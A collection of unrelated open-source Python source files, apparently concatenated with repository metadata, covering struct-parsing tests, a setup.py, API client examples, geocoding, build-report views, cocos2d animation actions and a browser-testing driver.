def test_TypeDefine():
@StructDefine("myinteger*1 : z")
class S1(StructFormatter): pass
TypeDefine('myinteger', 'xxx', 2)
TypeDefine('xxx', 'h')
s = S1()
xxx = StructDefine.All['xxx']
myint = StructDefine.All['myinteger']
assert xxx.unpack(b'\x01\x00') == 1
assert xxx == myint.type
assert myint.unpack(b'\x01\x00\x02\x00') == [1,2]
assert s.unpack(b'\x03\x00\x04\x00\x05\x00\x06\x00')
assert s.z == [[3,4]]
def test_Field_aliasing():
S1 = StructFactory("S1","I : i")
@StructDefine("S1 : x")
class S2(StructFormatter): pass
@StructDefine("S1 : y")
class S3(StructFormatter): pass
s = S2()
s.unpack(b'\x00\x00\x00\x01')
assert s.x.i == 0x01000000
q = S3()
S1.fields[0].order = '>'
q.unpack(b'\x01\x00\x00\x00')
assert q.y.i == 0x01000000
assert s.x.i == 0x01000000
def test_Struct_slop():
S1 = StructFactory("S1","c: a\nI : b")
assert S1.size()==8
S2 = StructFactory("S2","I: a\nc : b")
assert S2.size()==8
S3 = StructFactory("S3","c: a\nI : b",packed=True)
assert S3.size()==5
s1 = S1().unpack(b'\x41\xff\xff\xff\xef\xcd\xab\x89')
assert s1.a == b'A'
assert s1.b == 0x89abcdef
s2 = S2().unpack(b'\x01\x02\x03\x04\x42')
assert s2.a == 0x04030201
assert s2.b == b'B'
assert s2.pack() == b'\x01\x02\x03\x04\x42\0\0\0'
s3 = S3().unpack(b'\x43\x01\x00\x00\x00')
assert s3.a == b'C'
assert s3.b == 1
assert s3.pack() == b'\x43\x01\x00\x00\x00'
def test_Struct_CntFields():
@StructDefine("""
s*16 : uuidDesigner
I : cbStructSize
s*~I : bstrAddinRegKey
s*~I : bstrAddinName
s*~I : bstrAddinDescription
I : dwLoadBehaviour
s*~I : bstrSatelliteDll
s*~I : bstrAdditionalRegKey
I : dwCommandLineSafe
""",packed=True)
class DesignerInfo(StructFormatter):
order = '<'
def __init__(self,data="",offset=0):
if data:
self.unpack(data,offset)
d = DesignerInfo()
assert d.format() == '16sI#s#s#sI#s#sI'
assert d.size() == float('Infinity')
d.unpack(b'A'*16+
b'\x01\0\0\0'+
b'\x04\0\0\0abcd'+
b'\x04\0\0\0abcd'+
b'\x04\0\0\0abcd'+
b'\x02\0\0\0'+
b'\x04\0\0\0abcd'+
b'\x04\0\0\0abcd'+
b'\x03\0\0\0')
assert d.uuidDesigner == b'A'*16
assert d.bstrAddinRegKey == b'abcd'
assert d.dwCommandLineSafe == 3
|
tylerbutler/engineer | setup.py | Python | mit | 5,374 | 0.002419 | # coding=utf-8
# Bootstrap installation of setuptools
from ez_setup import use_setuptools
use_setuptools()
import os
import sys
from fnmatch import fnmatchcase
from distutils.util import convert_path
from propane_distribution import cmdclassdict
from setuptools import setup, find_packages
from engineer import version
PROJECT = 'engineer'
################################################################################
# find_package_data written by Ian Bicking.
# Provided as an attribute, so you | can append to these | instead
# of replicating them:
standard_exclude = ('*.py', '*.pyc', '*~', '.*', '*.bak', '*.swp*')
standard_exclude_directories = ('.*', 'CVS', '_darcs', './build',
'./dist', 'EGG-INFO', '*.egg-info')
def find_package_data(
where='.', package='',
exclude=standard_exclude,
exclude_directories=standard_exclude_directories,
only_in_packages=True,
show_ignored=False):
"""
Return a dictionary suitable for use in ``package_data``
in a distutils ``setup.py`` file.
The dictionary looks like::
{'package': [files]}
Where ``files`` is a list of all the files in that package that
don't match anything in ``exclude``.
If ``only_in_packages`` is true, then top-level directories that
are not packages won't be included (but directories under packages
will).
Directories matching any pattern in ``exclude_directories`` will
be ignored; by default directories with leading ``.``, ``CVS``,
and ``_darcs`` will be ignored.
If ``show_ignored`` is true, then all the files that aren't
included in package data are shown on stderr (for debugging
purposes).
Note patterns use wildcards, or can be exact paths (including
leading ``./``), and all searching is case-insensitive.
This function is by Ian Bicking.
"""
out = {}
stack = [(convert_path(where), '', package, only_in_packages)]
while stack:
where, prefix, package, only_in_packages = stack.pop(0)
for name in os.listdir(where):
fn = os.path.join(where, name)
if os.path.isdir(fn):
bad_name = False
for pattern in exclude_directories:
if fnmatchcase(name, pattern) or fn.lower() == pattern.lower():
bad_name = True
if show_ignored:
print >> sys.stderr, (
"Directory %s ignored by pattern %s"
% (fn, pattern))
break
if bad_name:
continue
if os.path.isfile(os.path.join(fn, '__init__.py')):
if not package:
new_package = name
else:
new_package = package + '.' + name
stack.append((fn, '', new_package, False))
else:
stack.append((fn, prefix + name + '/', package, only_in_packages))
elif package or not only_in_packages:
# is a file
bad_name = False
for pattern in exclude:
if fnmatchcase(name, pattern) or fn.lower() == pattern.lower():
bad_name = True
if show_ignored:
print >> sys.stderr, (
"File %s ignored by pattern %s"
% (fn, pattern))
break
if bad_name:
continue
out.setdefault(package, []).append(prefix + name)
return out
################################################################################
# noinspection PyShadowingBuiltins
def get_install_requirements(requirements_file='requirements.txt'):
requirements = []
with open(requirements_file) as file:
temp = file.readlines()
temp = [i[:-1] for i in temp]
for line in temp:
if line is None or line == '' or line.startswith(('#', '-e', '-r')):
continue
else:
requirements.append(line)
return requirements
# noinspection PyShadowingBuiltins
def get_readme():
with open('README.md') as file:
return file.read()
setup(
name=PROJECT,
version=version.string,
author='Tyler Butler',
author_email='tyler@tylerbutler.com',
platforms='any',
packages=find_packages(),
entry_points={
'console_scripts': [
'engineer=engineer.engine:cmdline',
'engineer_dev=engineer.devtools:main [dev]'
],
},
url='http://github.com/tylerbutler/engineer',
license='MIT',
description='A static website generator.',
long_description=get_readme(),
install_requires=get_install_requirements(),
tests_require=get_install_requirements('requirements_tests.txt'),
extras_require={
'dev': ['argh', 'clint']
},
cmdclass=cmdclassdict,
include_package_data=True,
package_data=find_package_data(PROJECT,
package=PROJECT,
only_in_packages=False),
# Setting to False doesn't create an egg - easier to debug and hack on
zip_safe=True,
)
|
googleads/googleads-python-lib | examples/ad_manager/v202202/creative_set_service/associate_creative_set_to_line_item.py | Python | apache-2.0 | 1,986 | 0.006042 | #!/usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You ma | y obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in wr | iting, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Creates a line item creative association for a creative set.
To create creative sets, run create_creative_set.py. To create creatives, run
create_creatives.py. To determine which LICAs exist, run get_all_licas.py.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
CREATIVE_SET_ID = 'INSERT_CREATIVE_SET_ID_HERE'
LINE_ITEM_ID = 'INSERT_LINE_ITEM_ID_HERE'
def main(client, creative_set_id, line_item_id):
# Initialize appropriate service.
lica_service = client.GetService(
'LineItemCreativeAssociationService', version='v202202')
# Create LICA for a creative set.
lica = {'creativeSetId': creative_set_id, 'lineItemId': line_item_id}
# Add LICA.
lica = lica_service.createLineItemCreativeAssociations([lica])
# Display results.
print(('LICA with line item ID "%s" and creative set ID "%s" was '
'created.') % (lica['lineItemId'], lica['creativeSetId']))
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client, CREATIVE_SET_ID, LINE_ITEM_ID)
|
yannrouillard/weboob | modules/regionsjob/job.py | Python | agpl-3.0 | 1,035 | 0.001932 | # -*- coding: utf-8 -*-
# Copyright(C) 2013 Bezleputh
#
# This file | is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
| # but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.capabilities.job import BaseJobAdvert
class RegionsJobAdvert(BaseJobAdvert):
@classmethod
def id2url(cls, _id):
splitted_id = _id.split('|')
return 'http://%s/offre_emploi/detailoffre.aspx?numoffre=%s&de=consultation' \
% (splitted_id[0], splitted_id[1])
|
jakobzhao/ashcrawler | core/geo.py | Python | lgpl-3.0 | 5,940 | 0.002416 | # !/usr/bin/python
# -*- coding: utf-8 -*-
#
# Created on Oct 16, 2015
# @author: Bo Zhao
# @email: bo_zhao@hks.harvard.edu
# @website: http://yenching.org
# @organization: Harvard Kennedy School
import urllib2
import json
import sys
from settings import BAIDU_AK
from log import *
reload(sys)
sys.setdefaultencoding('utf-8')
def geocode(loc):
lat, lng = -1, -1
url = 'http://api.map.baidu.com/geocoder/v2/?address=%s&output=json&ak=%s' % (loc, BAIDU_AK)
others = [u'其他', u'美国', u'英国', u'澳大利亚', u'伊朗', u'台湾', u'沙特阿拉伯',
u'爱尔兰', u'印度', u'印尼', u'奥地利', u'挪威', u'乌克兰', u'瑞士',
u'西班牙', u'古巴', u'挪威', u'德国', u'埃及', u'巴西', u'比利时']
if loc in others:
pass
else:
try:
response = urllib2.urlopen(url.replace(' ', '%20'))
except urllib2.HTTPError, e:
log(WARNING, e, 'geocode')
try:
loc_json = json.loads(response.read())
lat = loc_json[u'result'][u'location'][u'lat']
lng = loc_json[u'result'][u'location'][u'lng']
except ValueError:
log(ERROR, "No JSON object was decoded", 'geocode')
except KeyError, e:
log(ERROR, e.message, 'geocode')
return [lat, lng]
# Estimate where a post was sent out based on the semantics of the user's name,
# verified inforamtion, and/or other contextual information.
def geocode_by_semantics(project, address, port):
from pymongo import MongoClient
client = MongoClient(address, port)
db = client[project]
search_json = {'$or': [{'latlng': [0, 0]}, {'latlng': [-1, -1]}], 'verified': True}
users = db.users.find(search_json)
count = db.users.find(search_json).count()
print count
i = 0
for user in users:
i += 1
verified_info = user['verified_info']
username = user['username']
verified_info = verified_info.replace(u'主持人', '').replace(u'职员', '').replace(u'院长', '').replace(u'经理', '')
verified_info = verified_info.split(u' ')[0]
| if verified_info == u'前' or u'www' in verified_info or u'律师' in verified_info or u'学者' in verified_info or u'作家' in verified_info or u'媒体人' in verified_info or u'诗人' in verified_info:
verified_info = ''
locational_inf | o = verified_info
if locational_info == '':
locational_info = username
if verified_info != '':
latlng = geocode(verified_info)
else:
continue
log(NOTICE, '#%d geocode the user by its semantic info %s. %d posts remain. latlng: %s ' % (i, verified_info.encode('gbk', 'ignore'), count - i, str(latlng)))
if latlng[0] != -1 and latlng[0] != 0:
db.users.update({'userid': user['userid']}, {'$set': {'latlng': latlng}})
log(NOTICE, "mission compeletes.")
def geocode_locational_info(project, address, port):
from pymongo import MongoClient
client = MongoClient(address, port)
db = client[project]
search_json = {'$or': [{'latlng': [0, 0]}, {'latlng': [-1, -1]}], 'location': {'$ne': ''}}
users = db.users.find(search_json)
count = users.count()
print count
i = 0
for user in users:
i += 1
if 'location' in user.keys():
latlng = geocode(user['location'])
log(NOTICE, '#%d geocode the user by its locational info %s. %d posts remain. latlng: %s ' % (i, user['location'].encode('gbk', 'ignore'), count - i, str(latlng)))
if latlng[0] != -1 and latlng[0] != 0:
db.users.update({'userid': user['userid']}, {'$set': {'latlng': latlng}})
else:
continue
log(NOTICE, "mission compeletes.")
# Estimate where a post was sent out based the path of its author.
def estimate_location_by_path(user):
est_latlng = [-1, -1]
path = user['path']
latlng = user['latlng']
if user['path'] != [] and user['path'][0][0] != 0:
if latlng != [0, 0] and latlng != [-1, -1]:
path.append(latlng)
avg_lat = 0
avg_lng = 0
for latlng in path:
avg_lat += latlng[0]
avg_lng += latlng[1]
avg_lat /= float(len(path))
avg_lng /= float(len(path))
distances = []
for latlng in path:
distances.append(abs(latlng[0] - avg_lat) + abs(latlng[1] - avg_lng))
est_latlng = path[distances.index(min(distances))][0:2]
elif user['path'] == [] and latlng != [0, 0]:
est_latlng = latlng
else:
pass
return est_latlng
# Estimate where a post was sent out by the locational information of its author.
def georeference(project, address, port):
from pymongo import MongoClient
client = MongoClient(address, port)
db = client[project]
search_json = {'$or': [{'latlng': [0, 0]}, {'latlng': [-1, -1]}]}
posts = db.posts.find(search_json)
count = db.posts.find(search_json).count()
i = 0
for post in posts:
# userid = post['user']['userid']
username = post['user']['username']
user = db.users.find_one({'username': username})
i += 1
try:
if abs(user['latlng'][0] - 0) < 0.001:
pass
elif abs(user['latlng'][0] + 1) < 0.001:
pass
else:
try:
db.posts.update_many({'mid': post['mid']}, {'$set': {
'latlng': user['latlng']
}
})
log(NOTICE, 'georeferencing #%d, %d posts remain. latlng: %s ' % (i, count - i, str(user['latlng'])))
except:
log(NOTICE, 'the user latlng does not exit')
except:
print "user has been mistakenly deleted"
log(NOTICE, "mission compeletes.")
|
Vagab0nd/SiCKRAGE | lib3/twilio/rest/sync/v1/service/sync_stream/stream_message.py | Python | gpl-3.0 | 5,237 | 0.003246 | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import serialize
from twilio.base import values
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class StreamMessageList(ListResource):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
def __init__(self, version, service_sid, stream_sid):
"""
Initialize the StreamMessageList
:param Version version: Version that contains the resource
:param service_sid: The SID of the Sync Service that the resource is associated with
:param stream_sid: The unique string that identifies the resource
:returns: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageList
:rtype: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageList
"""
super(StreamMessageList, self).__init__(version)
# Path Solution
self._solution = {'service_sid': service_sid, 'stream_sid': stream_sid, }
self._uri = '/Services/{service_sid}/Streams/{stream_sid}/Messages'.format(**self._solution)
def create(self, data):
"""
Create the StreamMessageInstance
:param dict data: A JSON string that represents an arbitrary, schema-less object that makes up the Stream Message body
:returns: The created StreamMessageInstance
:rtype: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageInstance
"""
data = values.of({'Data': serialize.object(data), })
payload = self._version.create(method='POST', uri=self._uri, data=data, )
return StreamMessageInstance(
self._version,
payload,
service_sid=self._solution['service_sid'],
stream_sid=self._solution['stream_sid'],
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Sync.V1.StreamMessageList>'
class StreamMessagePage(Page):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
def __init__(self, version, response, solution):
"""
Initialize the StreamMessagePage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param service_sid: The SID of the Sync Service that the resource is associated with
:param stream_sid: The unique string that identifies the resource
:returns: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessagePage
:rtype: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessagePage
"""
super(StreamMessagePage, self).__init__(version, response)
# Path Solution
self._solution = solution
| def get_instance(self, payload):
"""
Build an instance of StreamMessageInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageInstance
:rtype: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageInstance
"""
return StreamMessageInstance(
self._version,
payloa | d,
service_sid=self._solution['service_sid'],
stream_sid=self._solution['stream_sid'],
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Sync.V1.StreamMessagePage>'
class StreamMessageInstance(InstanceResource):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
def __init__(self, version, payload, service_sid, stream_sid):
"""
Initialize the StreamMessageInstance
:returns: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageInstance
:rtype: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageInstance
"""
super(StreamMessageInstance, self).__init__(version)
# Marshaled Properties
self._properties = {'sid': payload.get('sid'), 'data': payload.get('data'), }
# Context
self._context = None
self._solution = {'service_sid': service_sid, 'stream_sid': stream_sid, }
@property
def sid(self):
"""
:returns: The unique string that identifies the resource
:rtype: unicode
"""
return self._properties['sid']
@property
def data(self):
"""
:returns: Stream Message body
:rtype: dict
"""
return self._properties['data']
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Sync.V1.StreamMessageInstance>'
|
andrewSC/checkthat | checkthat/views.py | Python | mit | 5,807 | 0.000689 | from .models import BuildFailure
# TODO: Make this class and its methods better in general.
class View:
def __init__(self):
self.char_padding_len = 30
def get_build_header(self):
return "{0} Build Results {0}".format('-' * self.char_padding_len)
def get_build_footer(self):
return "-" * len(self.get_build_header())
def get_failure_header(self):
return "{0} Failures {0}".format('-' * self.char_padding_len)
def get_failure_footer(self):
return "-" * len(self.get_failure_header())
def get_namcap_pkg_header(self):
return "{0} Namcap Pkg Analysis {0}".format('-' * self.char_padding_len)
def get_namcap_pkg_footer(self):
return "-" * len(self.get_namcap_pkg_header())
def get_namcap_pkgbuild_header(self):
return "{0} Namcap PKGBUILD Analysis {0}".format('-' * self.char_padding_len)
def get_namcap_pkgbuild_footer(self):
return "-" * len(self.get_namcap_pkgbuild_header())
# TODO: Refactor EmailView and CliView to remove duplicate code!!
# TODO: Make this better ASAP
class CliView(View):
def __init__(self):
super(CliView, self).__init__()
def generate_output(self, builds):
total_build_time = 0
has_failures = False
has_pkg_analysis = False # TODO: Make this better
has_pkgbuild_analysis = False # TODO: Make this better
print(self.get_build_header())
for build in builds:
print(build.status_msg)
total_build_time += build.total_build_time
if type(build) is BuildFailure:
has_failures = True
if build.namcap_pkgbuild_analysis:
has_pkgbuild_analysis = True
if build.namcap_pkg_analysis:
has_pkg_analysis = True
mins, secs = divmod(total_build_time, 60)
print(f"Total build time: {mins}m {secs}s")
print(self.get_build_footer())
if has_failures:
print(self.get_failure_header())
for build in builds:
if type(build) is BuildFailure:
header = f"xxxxxxxxxxxxxxx {build.status_msg} xxxxxxxxxxxxxxx"
footer = "x" * len(header)
print(header)
for error in build.error_msgs:
print(error)
| print(footer)
print(self.get_failure_footer())
if has_pkgbuild_analysis:
print(self.get_namcap_pkgbuild_header())
| for build in builds:
msgs = build.namcap_pkgbuild_analysis.msgs
# NOTE: We need to check the list to make sure it has actual
# content and not just the empty string
if any([item for item in msgs if item != '']):
for msg in msgs:
print(msg)
print(self.get_namcap_pkgbuild_footer())
if has_pkg_analysis:
print(self.get_namcap_pkg_header())
for build in builds:
if type(build) is not BuildFailure:
for msg in build.namcap_pkg_analysis.msgs:
print(msg)
print(self.get_namcap_pkg_footer())
# TODO: Refactor EmailView and CliView to remove duplicate code!!
# TODO: Make this better ASAP
class EmailView(View):
def __init__(self):
super(EmailView, self).__init__()
def generate_output(self, builds):
total_build_time = 0
has_failures = False
has_pkg_analysis = False # TODO: Make this better
has_pkgbuild_analysis = False # TODO: Make this better
output = []
output.append(self.get_build_header() + '\n')
for build in builds:
output.append(build.status_msg + '\n')
total_build_time += build.total_build_time
if type(build) is BuildFailure:
has_failures = True
if build.namcap_pkgbuild_analysis:
has_pkgbuild_analysis = True
if build.namcap_pkg_analysis:
has_pkg_analysis = True
mins, secs = divmod(total_build_time, 60)
output.append(f"\nTotal build time: {mins}m {secs}s\n")
output.append(self.get_build_footer() + '\n\n')
if has_failures:
output.append(self.get_failure_header() + '\n')
for build in builds:
if type(build) is BuildFailure:
header = f"xxxxxxxxxxxxxxx {build.status_msg} xxxxxxxxxxxxxxx"
footer = "x" * len(header)
output.append('\n' + header + '\n')
for error in build.error_msgs:
output.append(error + '\n')
output.append(footer + '\n')
output.append(self.get_failure_footer() + '\n\n')
if has_pkgbuild_analysis:
output.append(self.get_namcap_pkgbuild_header() + '\n')
for build in builds:
msgs = build.namcap_pkgbuild_analysis.msgs
# NOTE: We need to check the list to make sure it has actual
# content and not just the empty string
if any([item for item in msgs if item != '']):
for msg in msgs:
output.append(msg + '\n')
output.append(self.get_namcap_pkgbuild_footer() + '\n\n')
if has_pkg_analysis:
output.append(self.get_namcap_pkg_header() + '\n')
for build in builds:
if type(build) is not BuildFailure:
for msg in build.namcap_pkg_analysis.msgs:
output.append(msg + '\n')
output.append(self.get_namcap_pkg_footer() + '\n')
return ''.join(output)
|
shadowmint/nwidget | lib/cocos2d-0.5.5/cocos/actions/interval_actions.py | Python | apache-2.0 | 22,046 | 0.009027 | # ----------------------------------------------------------------------------
# cocos2d
# Copyright (c) 2008-2012 Daniel Moisset, Ricardo Quesada, Rayentray Tappa,
# Lucio Torre
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of cocos2d nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''Interval Action
Interval Actions
================
An interval action is an action that takes place within a certain period of time.
It has an start time, and a finish time. The finish time is the parameter
``duration`` plus the start time.
These `IntervalAction` have some interesting properties, like:
- They can run normally (default)
- They can run reversed with the `Reverse` action.
- They can run with the time altered with the `Accelerate`, `AccelDeccel` and
`Speed` actions.
For example, you can simulate a Ping Pong effect running the action normally and
then running it again in Reverse mode.
Example::
ping_pong_action = action + Reverse( action )
Available IntervalActions
=========================
* `MoveTo`
* `MoveBy`
* `JumpTo`
* `JumpBy`
* `Bezier`
* `Blink`
* `RotateTo`
* `RotateBy`
* `ScaleTo`
* `ScaleBy`
* `FadeOut`
* `FadeIn`
* `FadeTo`
* `Delay`
* `RandomDelay`
Modifier actions
================
* `Accelerate`
* `AccelDeccel`
* `Speed`
Examples::
move = MoveBy( (200,0), duration=5 ) # Moves 200 pixels to the right in 5 seconds.
move = MoveTo( (320,240), duration=5) # Moves to the pixel (320,240) in 5 seconds
jump = JumpBy( (320,0), 100, 5, duration=5) # Jumps to the right 320 pixels
# doing 5 jumps of 100 pixels
# of height in 5 seconds
accel_move = Accelerate(move) # accelerates action move
'''
__docformat__ = 'restructuredtext'
import random
import cop | y
import math
from base_actions im | port *
from cocos.euclid import *
__all__ = [ 'Lerp', # interpolation
'MoveTo','MoveBy', # movement actions
'Jump', 'JumpTo', 'JumpBy',
'Bezier', # complex movement actions
'Rotate',"RotateTo", "RotateBy", # object rotation
'ScaleTo','ScaleBy', # object scale
'Delay','RandomDelay', # Delays
'FadeOut','FadeIn','FadeTo', # Fades in/out action
'Blink', # Blink action
'Accelerate','AccelDeccel','Speed', # Time alter actions
]
class Lerp( IntervalAction ):
"""
Interpolate between values for some specified attribute
"""
def init(self, attrib, start, end, duration):
"""Init method.
:Parameters:
`attrib` : string
The name of the attrbiute where the value is stored
`start` : float
The start value
`end` : float
The end value
`duration` : float
Duration time in seconds
"""
self.attrib = attrib
self.duration = duration
self.start_p = start
self.end_p = end
self.delta = end-start
def update(self, t):
setattr(self.target, self.attrib,
self.start_p + self.delta * t
)
def __reversed__(self):
return Lerp(self.attrib, self.end_p, self.start_p, self.duration)
class RotateBy( IntervalAction ):
"""Rotates a `CocosNode` object clockwise a number of degrees
by modiying it's rotation attribute.
Example::
# rotates the sprite 180 degrees in 2 seconds
action = RotateBy( 180, 2 )
sprite.do( action )
"""
def init(self, angle, duration ):
"""Init method.
:Parameters:
`angle` : float
Degrees that the sprite will be rotated.
Positive degrees rotates the sprite clockwise.
`duration` : float
Duration time in seconds
"""
self.angle = angle #: Quantity of degrees to rotate
self.duration = duration #: Duration in seconds
def start( self ):
self.start_angle = self.target.rotation
def update(self, t):
self.target.rotation = (self.start_angle + self.angle * t ) % 360
def __reversed__(self):
return RotateBy(-self.angle, self.duration)
Rotate = RotateBy
class RotateTo( IntervalAction ):
"""Rotates a `CocosNode` object to a certain angle by modifying it's
rotation attribute.
The direction will be decided by the shortest angle.
Example::
# rotates the sprite to angle 180 in 2 seconds
action = RotateTo( 180, 2 )
sprite.do( action )
"""
def init(self, angle, duration ):
"""Init method.
:Parameters:
`angle` : float
Destination angle in degrees.
`duration` : float
Duration time in seconds
"""
self.angle = angle%360 #: Destination angle in degrees
self.duration = duration #: Duration in seconds
def start( self ):
ea = self.angle
sa = self.start_angle = (self.target.rotation%360)
self.angle = ((ea%360) - (sa%360))
if self.angle > 180:
self.angle = -360+self.angle
if self.angle < -180:
self.angle = 360+self.angle
def update(self, t):
self.target.rotation = (self.start_angle + self.angle * t ) % 360
def __reversed__(self):
return RotateTo(-self.angle, self.duration)
class Speed( IntervalAction ):
"""
Changes the speed of an action, making it take longer (speed>1)
or less (speed<1)
Example::
# rotates the sprite 180 degrees in 1 secondclockwise
action = Speed( Rotate( 180, 2 ), 2 )
sprite.do( action )
"""
def init(self, other, speed ):
"""Init method.
:Parameters:
`other` : IntervalAction
The action that will be affected
`speed` : float
The speed change. 1 is no change.
2 means twice as fast, takes half the time
0.5 means half as fast, takes double the time
"""
self.other = other
self.speed = speed
self.duration |
arekfu/project_euler | p0012/p0012.py | Python | mit | 839 | 0.008343 | #!/usr/bin/env python3
import math
from collections import Counter
import operator
import functools
DICT_FACTORS = dict()
def factorize(n) | :
if n in DICT_FACTORS:
return DICT_FACTORS[n]
cnt = Counter()
sqrtn = int(math.sqrt(n)) + 1
for i in range(2, sqrtn + 1):
if n % i == 0:
cnt[i] += 1
cnt += factorize(n // i)
break
else:
cnt[n] += 1
DICT_FACTORS[n] = cnt
return cnt
def n_divisors(n):
factors = factorize(n)
n_div = functools.redu | ce(operator.mul, (val+1 for val in factors.values()), 1)
return n_div
def triangular_number(n):
return n*(n+1)//2
i=100
while True:
n = triangular_number(i)
n_div = n_divisors(n)
if n_div>500:
print(n)
break
print('{}, {}: {}'.format(n, i, n_div))
i = i + 1
|
devenbansod/SWD-Query | splinter/driver/zopetestbrowser.py | Python | gpl-2.0 | 12,097 | 0.001736 | # -*- coding: utf-8 -*-
# Copyright 2012 splinter authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import re
from lxml.cssselect import CSSSelector
from zope.testbrowser.browser import Browser
from splinter.element_list import ElementList
from splinter.exceptions import ElementDoesNotExist
from splinter.driver import DriverAPI, ElementAPI
from splinter.cookie_manager import CookieManagerAPI
import mimetypes
import lxml.html
import mechanize
import time
class CookieManager(CookieManagerAPI):
def __init__(self, browser_cookies):
self._cookies = browser_cookies
def add(self, cookies):
if isinstance(cookies, list):
for cookie in cookies:
for key, value in cookie.items():
self._cookies[key] = value
return
for key, value in cookies.items():
self._cookies[key] = value
def delete(self, *cookies):
if cookies:
for cookie in cookies:
try:
del self._cookies[cookie]
except KeyError:
pass
else:
self._cookies.clearAll()
def all(self, verbose=False):
cookies = {}
for key, value in self._cookies.items():
cookies[key] = value
return cookies
def __getitem__(self, item):
return self._cookies[item]
def __eq__(self, other_object):
if isinstance(other_object, dict):
return dict(self._cookies) == other_object
class ZopeTestBrowser(DriverAPI):
driver_name = "zope.testbrowser"
def __init__(self, user_agent=None, wait_time=2):
self.wait_time = wait_time
mech_browser = self._get_mech_browser(user_agent)
self._browser = Browser(mech_browser=mech_browser)
self._cookie_manager = CookieManager(self._browser.cookies)
self._last_urls = []
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
pass
def visit(self, url):
self._browser.open(url)
def back(self):
self._last_urls.insert(0, self.url)
self._browser.goBack()
def forward(self):
try:
self.visit(self._last_urls.pop())
except IndexError:
pass
def reload(self):
self._browser.reload()
def quit(self):
pass
@property
def htmltree(self):
return lxml.html.fromstring(self.html.decode('utf-8'))
@property
def title(self):
return self._browser.title
@property
def html(self):
return self._browser.contents
@property
def url(self):
return self._browser.url
def find_option_by_value(self, value):
html = self.htmltree
element = html.xpath('//option[@value="%s"]' % value)[0]
control = self._browser.getControl(element.text)
return ElementList([ZopeTestBrowserOptionElement(control, self)], find_by="value", query=value)
def find_option_by_text(self, text):
html = self.htmltree
element = html.xpath('//option[normalize-space(text())="%s"]' % text)[0]
control = self._browser.getControl(element.text)
return ElementList([ZopeTestBrowserOptionElement(control, self)], find_by="text", query=text)
def find_by_css(self, selector):
xpath = CSSSelector(selector).path
return self.find_by_xpath(xpath, original_find="css", original_selector=selector)
def find_by_xpath(self, xpath, original_find=None, original_selector=None):
html = self.htmltree
elements = []
for xpath_element in html.xpath(xpath):
